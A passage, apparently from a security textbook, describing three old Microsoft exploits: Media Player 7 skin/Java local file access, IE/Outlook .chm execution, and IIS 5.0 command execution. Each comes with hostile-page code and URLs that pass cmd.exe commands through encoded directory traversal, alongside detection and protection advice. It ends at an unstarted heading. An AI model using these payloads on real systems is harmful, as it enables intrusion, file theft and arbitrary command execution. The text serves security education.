There is a security vulnerability in the Windows Media Player 7 application that is exploitable through IE and Java. This exploit enables someone to read local files and browse local directories as well as execute arbitrary programs. This could lead to a remote user taking full control over the victim’s computer.
Exploit Details
• Name: Media Player 7 and IE Java vulnerability
• Operating System: Windows 95,98, 98se, 2000, NT
• Protocols/Services: IE Java, Windows Media Player 7
How the Exploit Works
Windows Media Player skins are installed in a commonly known directory with a commonly known name: “C:/Program files/Windows Media
Player/Skins/SKIN.WMZ”.
The < IFRAME SRC=”wmp2.wmz”>< /IFRAME> will download wmp2.wmz and place it in “C:/Program files/Windows Media
Player/Skins/wmp2.wmz”.
If wmp2.wmz is a java jar archive with the following applet tag,
---
< APPLET CODEBASE="file://c:/" ARCHIVE="Program files/Windows Media
Player/SKINS/wmp2.wmz" CODE="gjavacodebase.class" WIDTH=700 HEIGHT=300> < PARAM
NAME="URL" VALUE="file:///c:/test.txt"> < /APPLET>
---
it will be executed with codebase=file://c:/, and the applet will have read only access to C:\.
How to Use the Exploit
Any HTML editor can be used to make the hostile web site. Create a page with the given code. When a user links to that page, the vulnerability will be exploited.
Signature of the Attack
A sign of this exploit is when programs activate that the user did not intentionally start.
How to Protect Against It
The best way to prevent against this attack is to disable Java, which is not always possible. As you can see with a lot of these new exploits, there is not a lot that can be done except to make sure all your systems and networking components implement a principle of least privilege and that you have defense in depth mechanisms in place protecting your corporate assets.
Source Code/Pseudo Code
The following is the source code that an attacker would put on a hostile web page and wait for a victim to connect:
---wmp7-3.html---
< IFRAME SRC="wmp2.wmz" WIDTH=1 HEIGHT=1>< /IFRAME>
< SCRIPT>
function f() {
window.open("wmp7-3a.html");
}
setTimeout("f()",4000);
< /SCRIPT>
--- ---wmp7-3a.html---
< APPLET CODEBASE="file://c:/"
ARCHIVE="Program files/Windows Media Player/SKINS/wmp2.wmz"
CODE="gjavacodebase.class"
WIDTH=700 HEIGHT=300>
< PARAM NAME="URL" VALUE="file:///c:/test.txt">
< /APPLET>
---
Additional Information
The following URL is where the source code and additional information can be found: http://www.net-
security.org/text/bugs/979586134,83134,.shtml
IE 5.x/Outlook Allows Executing Arbitrary Programs There is a security vulnerability in IE 5.x/Outlook/Outlook Express, which allows the execution of arbitrary programs using .chm files. This will reveal the location of the temporary Internet file folder on the victim’s machine. This can lead to an attacker taking full control over the victim’s computer.
Exploit Details
• Name: IE 5.x/Outlook allows executing arbitrary programs using .chm files and the temporary Internet file folder.
• Operating System: Windows 95, 98, 98se, NT, 2000
• Protocols/Services: IE 5.x/Outlook/Outlook Express
How the Exploit Works
<OBJECT DATA=“http://SOMEHOST.COM/chmtemp.html”
TYPE=“text/html” WIDTH=200 HEIGHT=200> may reveal one of the temporary internet files folders through the document’s URL (where SOMEHOST.COM is a web server or alias that is different from the web server from which the HTML page is loaded). After a temporary Internet file folder name is known, it is possible to cache a .chm in any temporary Internet file folder and then use window.showHelp() to execute it.
Signature of the Attack
The only way to tell that this exploit has been used is if applications begin without the user activating them.
How to Protect Against It
This kind of attack can be avoided by setting the IE security on your machine to high.
Source Code/Pseudo Code
The following is the source code for running this exploit:
---chmtempmain.html--- ---
<IMG SRC="chm1.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm2.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm3.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm4.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm5.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm6.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm7.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm8.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm9.chm" WIDTH=1 HEIGHT=1>
<IMG SRC="chm10.chm" WIDTH=1 HEIGHT=1>
<BR>
The object below must be loaded from a server with name different from the parent
document - it may be the same server but use the IP address or another alias.
<BR>
If this does not work try increasing the number of "chm*.chm"
in IMG and showHelp.
<BR>
<OBJECT DATA="http://guninski.com/chmtemp.html"
TYPE="text/html" WIDTH=200 HEIGHT=200>
--- ---
---chtmtemp.html--- ---
<SCRIPT>
function g() {
s=document.URL;
path=s.substr(0,s.lastIndexOf("\\"));
path=unescape(path);
alert("One of your temp files directory is: "+path);
window.showHelp(path+"\\chm1[1].chm");
window.showHelp(path+"\\chm2[1].chm");
window.showHelp(path+"\\chm3[1].chm");
window.showHelp(path+"\\chm4[1].chm");
window.showHelp(path+"\\chm5[1].chm");
window.showHelp(path+"\\chm6[1].chm");
window.showHelp(path+"\\chm7[1].chm");
window.showHelp(path+"\\chm8[1].chm");
window.showHelp(path+"\\chm9[1].chm");
window.showHelp(path+"\\chm10[1].chm");
}
setTimeout("g()",5000); // if you are on a slow internet connection you must
increase the delay
</SCRIPT>
--- ---
Additional Information
Source code and additional information can be found at http://www.guninski.com/
IIS 5.0 Allows Executing Arbitrary Commands on the Web Server
If patch Q277873 is installed on IIS 5.0, then a remote attacker can execute arbitrary programs on the web server.
Exploit Details
• Name: IIS 5.0 with patch Q277873 allows executing arbitrary commands on the web server
• Operating System: Any Microsoft Server Platform with IIS 5.0 and patch Q277873
• Protocols/Services: IIS 5.0
How the Exploit Works
When IIS receives a valid request for an executable file, it passes the name of the requested file to the Windows operating system for
processing. It is possible for an attacker to create a malformed file request that contains both a file name and one or more operating system
commands. When the system receives this request, IIS passes the entire string to the operating system, which would then process the file and execute the commands.
How to Use the Exploit
The only product needed to run the exploit is an Internet browser and the given Script.
Signature of the Attack
The only way to tell if someone is using this exploit on a given system is to watch the event logs and look for unusual hard drive and application activity. Therefore, until the vendors release patches, knowing thy system is a key principle for network security.
How to Protect Against It
Uninstall the Q277873 patch until Microsoft releases a fix. This is a case where a patch fixes one problem, but creates another one. This is why it is so important to test any patches before applying them to a production system.
Source Code/Pseudo Code
The following are the URLs an attacker would run to extract information:
http://SOMEHOST/scripts/georgi.bat/..%C1%9C..%C1%9C..%C1%9Cwin nt/ system32/cmd.exe?/
c%20dir%20C:\
This executes “DIR C:\”, and when the system prompts, save the output to a file. By expanding this concept, an attacker can read most files by using:
http://SOMEHOST/scripts/georgi.asp/..%C1%9C..%C1%9C..%C1%9Ctes t.txt
Additional Information
Additional information and the source code can be found at:
http://www.guninski.com/iisasp.html
Microsoft WINS Domain Controller Spoofing Vulnerability